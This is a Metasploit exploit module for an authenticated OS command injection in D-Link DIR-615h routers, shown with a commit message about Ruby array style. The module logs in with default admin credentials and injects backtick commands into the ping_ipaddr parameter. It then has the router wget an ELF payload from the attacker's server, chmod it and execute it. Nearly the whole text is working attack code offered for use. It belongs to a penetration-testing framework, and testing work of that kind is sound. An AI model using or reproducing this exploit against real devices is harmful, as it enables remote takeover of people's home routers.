c547e84fa7
According to the Ruby style guide, %w{} collections for arrays of single
words are preferred. They're easier to type, and if you want a quick
grep, they're easier to search.
This change converts all Payloads to this format if there is more than
one payload to choose from.
It also alphabetizes the payloads, so the order can be more predictable,
and for long sets, easier to scan with eyeballs.
See:
https://github.com/bbatsov/ruby-style-guide#collections
263 lines
8.3 KiB
Ruby
263 lines
8.3 KiB
Ruby
##
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# This file is part of the Metasploit Framework and may be subject to
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# redistribution and commercial restrictions. Please see the Metasploit
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# web site for more information on licensing and terms of use.
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# http://metasploit.com/
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##
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require 'msf/core'
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class Metasploit3 < Msf::Exploit::Remote
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Rank = ExcellentRanking
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include Msf::Exploit::Remote::HttpClient
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include Msf::Exploit::Remote::HttpServer
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include Msf::Exploit::EXE
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include Msf::Exploit::FileDropper
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def initialize(info = {})
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super(update_info(info,
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'Name' => 'D-Link DIR615h OS Command Injection',
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'Description' => %q{
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Some D-Link Routers are vulnerable to an authenticated OS command injection on
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their web interface, where default credentials are admin/admin or admin/password.
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Since it is a blind os command injection vulnerability, there is no output for the
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executed command when using the cmd generic payload. This module was tested against
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a DIR-615 hardware revision H1 - firmware version 8.04. A ping command against a
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controlled system could be used for testing purposes. The exploit uses the wget
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client from the device to convert the command injection into an arbitrary payload
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execution.
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},
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'Author' =>
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[
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'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
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'juan vazquez' # minor help with msf module
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],
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'License' => MSF_LICENSE,
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'References' =>
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[
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[ 'BID', '57882' ],
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[ 'EDB', '24477' ],
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[ 'OSVDB', '90174' ],
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[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-008' ]
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],
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'DisclosureDate' => 'Feb 07 2013',
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'Privileged' => true,
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'Platform' => %w{ linux unix },
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'Payload' =>
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{
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'DisableNops' => true
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},
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'Targets' =>
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[
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[ 'CMD',
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{
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'Arch' => ARCH_CMD,
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'Platform' => 'unix'
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}
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],
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[ 'Linux mipsel Payload',
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{
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'Arch' => ARCH_MIPSLE,
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'Platform' => 'linux'
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}
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],
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],
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'DefaultTarget' => 1,
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))
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register_options(
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[
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OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
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OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]),
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OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
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OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
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OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
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], self.class)
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end
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def request(cmd)
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begin
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res = send_request_cgi({
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'uri' => @uri,
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'method' => 'GET',
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'vars_get' => {
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"page" => "tools_vct",
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"hping" => "0",
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"ping_ipaddr" => "1.1.1.1`#{cmd}`",
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"ping6_ipaddr" => ""
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}
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})
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return res
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rescue ::Rex::ConnectionError
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vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
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return nil
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end
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end
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def exploit
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downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
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@uri = '/tools_vct.htm'
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user = datastore['USERNAME']
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pass = datastore['PASSWORD']
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@timeout = 5
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#
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# testing Login
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#
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print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
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begin
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res= send_request_cgi({
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'uri' => '/login.htm',
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'method' => 'POST',
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'vars_post' => {
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"page" => "login",
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"submitType" => "0",
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"identifier" => "",
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"sel_userid" => user,
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"userid" => "",
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"passwd" => pass,
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"captchapwd" => ""
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}
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})
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if res.nil? or res.code == 404
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fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
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end
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if res.body =~ /\<script\ langauge\=\"javascript\"\>showMainTabs\(\"setup\"\)\;\<\/script\>/
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print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
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else
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fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
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end
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rescue ::Rex::ConnectionError
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fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
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end
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if target.name =~ /CMD/
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if not (datastore['CMD'])
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fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
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end
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cmd = payload.encoded
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res = request(cmd)
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if (!res)
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fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
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else
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print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
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end
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return
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end
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#thx to Juan for his awesome work on the mipsel elf support
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@pl = generate_payload_exe
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@elf_sent = false
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#
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# start our server
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#
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resource_uri = '/' + downfile
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if (datastore['DOWNHOST'])
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service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
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else
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#do not use SSL
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if datastore['SSL']
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ssl_restore = true
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datastore['SSL'] = false
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end
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if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
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srv_host = Rex::Socket.source_address(rhost)
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else
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srv_host = datastore['SRVHOST']
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end
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service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
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print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
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start_service({'Uri' => {
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'Proc' => Proc.new { |cli, req|
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on_request_uri(cli, req)
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},
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'Path' => resource_uri
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}})
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datastore['SSL'] = true if ssl_restore
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end
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#
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# download payload
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#
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print_status("#{rhost}:#{rport} - Asking the D-Link device to download #{service_url}")
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#this filename is used to store the payload on the device
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filename = rand_text_alpha_lower(8)
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#not working if we send all command together -> lets take three requests
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cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
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res = request(cmd)
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if (!res)
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fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
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end
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# wait for payload download
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if (datastore['DOWNHOST'])
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print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the D-Link device to download the payload")
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select(nil, nil, nil, datastore['HTTP_DELAY'])
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else
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wait_linux_payload
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end
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register_file_for_cleanup("/tmp/#{filename}")
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print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
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select(nil, nil, nil, @timeout)
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#
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# chmod
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#
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cmd = "chmod 777 /tmp/#{filename}"
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print_status("#{rhost}:#{rport} - Asking the D-Link device to chmod #{downfile}")
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res = request(cmd)
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if (!res)
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fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
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end
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print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
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select(nil, nil, nil, @timeout)
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#
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# execute
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#
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cmd = "/tmp/#{filename}"
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print_status("#{rhost}:#{rport} - Asking the D-Link device to execute #{downfile}")
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res = request(cmd)
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if (!res)
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fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
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end
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end
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# Handle incoming requests from the server
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def on_request_uri(cli, request)
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#print_status("on_request_uri called: #{request.inspect}")
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if (not @pl)
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print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
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return
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end
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print_status("#{rhost}:#{rport} - Sending the payload to the server...")
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@elf_sent = true
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send_response(cli, @pl)
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end
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# wait for the data to be sent
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def wait_linux_payload
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print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
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waited = 0
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while (not @elf_sent)
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select(nil, nil, nil, 1)
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waited += 1
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if (waited > datastore['HTTP_DELAY'])
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fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
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end
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end
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end
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end
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